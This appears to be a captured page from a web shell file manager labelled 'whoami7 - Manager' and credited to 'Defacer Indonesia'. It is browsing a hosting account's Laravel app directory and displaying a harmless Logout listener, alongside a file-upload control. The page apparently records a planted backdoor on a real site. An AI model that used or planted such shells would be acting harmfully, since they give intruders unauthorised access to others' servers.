whoami7 - Manager
:
/
home
/
qbizpnmr
/
test.qbiztax.com
/
app
/
Listeners
/
Auth
/
Upload File:
files >> //home/qbizpnmr/test.qbiztax.com/app/Listeners/Auth/Logout.php
<?php namespace App\Listeners\Auth; use Illuminate\Auth\Events\Logout as Event; class Logout { /** * Handle the event. * * @param Event $event * @return void */ public function handle(Event $event) { session()->forget('company_id'); } }
Copyright ©2021 || Defacer Indonesia